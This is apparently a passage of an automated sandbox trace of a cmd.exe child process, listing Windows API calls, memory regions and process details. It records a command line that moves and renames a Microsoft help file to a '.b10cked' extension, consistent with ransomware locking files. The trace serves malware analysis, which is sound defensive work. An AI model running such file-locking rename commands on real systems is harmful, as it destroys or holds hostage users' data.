[0205.387] FreeEnvironmentStringsW (penv=0x362b00) returned 1 [0205.387] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.387] GetConsoleOutputCP () returned 0x1b5 [0205.389] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.390] GetUserDefaultLCID () returned 0x409 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="0") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="0") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f6f8, cchData=128 | out: lpLCData="1") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0205.390] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0205.391] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0205.391] GetConsoleTitleW (in: lpConsoleTitle=0x3508e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0205.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0205.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0205.392] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0205.392] _wcsicmp (_String1="move", _String2=")") returned 68 [0205.392] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0205.392] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0205.392] _wcsicmp (_String1="IF", _String2="move") returned -4 [0205.393] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0205.393] _wcsicmp (_String1="REM", _String2="move") returned 5 [0205.393] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0205.396] GetConsoleTitleW (in: lpConsoleTitle=0x22f3f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0205.396] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0205.396] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0205.396] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CD") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="REN") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0205.396] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0205.396] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0205.396] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0205.396] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="MD") returned 11 [0205.396] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0205.396] _wcsicmp (_String1="move", _String2="RD") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0205.396] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0205.396] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0205.396] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0205.396] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0205.396] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="VER") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0205.396] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0205.397] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0205.397] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0205.397] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0205.397] _wcsicmp (_String1="move", _String2="START") returned -6 [0205.397] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0205.397] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0205.397] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0205.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.398] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0205.398] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f1ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f1a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f1a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0205.398] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0205.399] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0205.399] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0205.399] _wcsicmp (_String1="MSVISI~2.HXN", _String2=".") returned 63 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2="..") returned 63 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~2.hxn")) returned 0x2022 [0205.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x361e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", nBufferLength=0x104, lpBuffer=0x22eb34, lpFilePart=0x22eb1c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", lpFilePart=0x22eb1c*="MSVISI~2.HXN") returned 0x27 [0205.400] 
SetErrorMode (uMode=0x0) returned 0x1 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2=".") returned 63 [0205.400] _wcsicmp (_String1="MSVISI~2.HXN", _String2="..") returned 63 [0205.400] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msvisi~2.hxn")) returned 0x2022 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.400] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", nBufferLength=0x104, lpBuffer=0x22efb0, lpFilePart=0x22ed48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", lpFilePart=0x22ed48*="MSVISI~2.HXN") returned 0x27 [0205.400] SetErrorMode (uMode=0x0) returned 0x1 [0205.400] SetErrorMode (uMode=0x0) returned 0x0 [0205.400] SetErrorMode (uMode=0x1) returned 0x0 [0205.401] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x22f1b8, lpFilePart=0x22ed48 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked", lpFilePart=0x22ed48*="MS.VISIO_STD.14.1033.hxn.b10cked") returned 0x3b [0205.401] SetErrorMode (uMode=0x0) returned 0x1 [0205.401] SetLastError (dwErrCode=0x0) [0205.401] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.VISIO_STD.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.visio_std.14.1033.hxn.b10cked")) returned 0xffffffff [0205.401] GetLastError () returned 0x2 [0205.401] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22e6c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6c4) returned 0x350e88 [0205.401] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x22e6c4 | out: 
lpFindFileData=0x22e6c4) returned 0 [0205.401] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.401] GetLastError () returned 0x12 [0205.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x22e6c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6c4) returned 0x350e88 [0205.402] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x22e6c4 | out: lpFindFileData=0x22e6c4) returned 0 [0205.402] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.402] GetLastError () returned 0x12 [0205.402] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x361bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361bf0) returned 0x350e88 [0205.403] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x361bf0 | out: lpFindFileData=0x361bf0) returned 0 [0205.403] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.403] GetLastError () returned 0x12 [0205.403] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSVISI~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x361bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x361bf0) returned 0x350e88 [0205.403] FindNextFileW (in: hFindFile=0x350e88, lpFindFileData=0x361bf0 | out: lpFindFileData=0x361bf0) returned 0 [0205.403] FindClose (in: hFindFile=0x350e88 | out: hFindFile=0x350e88) returned 1 [0205.403] GetLastError () returned 0x12 [0205.403] _get_osfhandle (_FileHandle=2) returned 0xb [0205.403] GetFileType (hFile=0xb) returned 0x2 [0205.411] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0205.411] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22e894 | out: lpMode=0x22e894) returned 1 [0205.411] _get_osfhandle (_FileHandle=2) returned 0xb [0205.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, 
lpConsoleScreenBufferInfo=0x22e8c8 | out: lpConsoleScreenBufferInfo=0x22e8c8) returned 1 [0205.411] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.412] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x22e908 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0205.412] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x22e8ec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22e8ec*=0x2c) returned 1 [0205.413] longjmp () [0205.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.413] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.413] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.413] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.413] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.413] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.413] SetConsoleInputExeNameW () returned 0x1 [0205.413] GetConsoleOutputCP () returned 0x1b5 [0205.413] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.413] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.414] exit (_Code=1) Process: id = "482" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINPROJ.14.1033.hxn.b10cked\"" cur_dir = 
"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29430 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29431 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29432 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29433 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29434 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29435 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29436 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29437 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29438 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdc000" filename = "" Region: id = 29439 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30197 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30198 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30199 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30200 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 30201 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 30202 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30203 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30204 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30205 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30206 start_va = 0x76a90000 end_va = 
0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30207 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30208 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30209 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30210 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30211 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 30212 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30213 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30214 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30215 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30216 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 
region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30217 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 30218 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 30219 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 30220 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 30271 start_va = 0x1300000 end_va = 0x13bffff entry_point = 0x1300000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 679 os_tid = 0xa48 [0204.333] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd7c | out: lpSystemTimeAsFileTime=0x18fd7c*(dwLowDateTime=0xae99ba60, dwHighDateTime=0x1d440a9)) [0204.333] GetCurrentProcessId () returned 0xa14 [0204.333] GetCurrentThreadId () returned 0xa48 [0204.333] GetTickCount () returned 0x39980 [0204.333] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd74 | out: lpPerformanceCount=0x18fd74*=26112262704) returned 1 [0204.334] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0204.334] __set_app_type (_Type=0x1) [0204.334] __p__fmode () returned 0x76b331f4 [0204.334] __p__commode () returned 0x76b331fc [0204.334] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0204.334] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0204.334] GetCurrentThreadId () returned 0xa48 [0204.334] OpenThread (dwDesiredAccess=0x1fffff, 
bInheritHandle=0, dwThreadId=0xa48) returned 0x38 [0204.334] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.335] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0204.335] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.335] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0204.335] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fd0c | out: phkResult=0x18fd0c*=0x0) returned 0x2 [0204.335] VirtualQuery (in: lpAddress=0x18fd43, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0204.335] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcdc, dwLength=0x1c | out: lpBuffer=0x18fcdc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0204.335] GetConsoleOutputCP () returned 0x1b5 [0204.335] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | 
out: lpCPInfo=0x4a9e4260) returned 1 [0204.335] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.335] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.335] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.336] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.336] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.336] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.336] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.336] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.336] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.336] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.336] GetEnvironmentStringsW () returned 0x330180* [0204.337] FreeEnvironmentStringsW 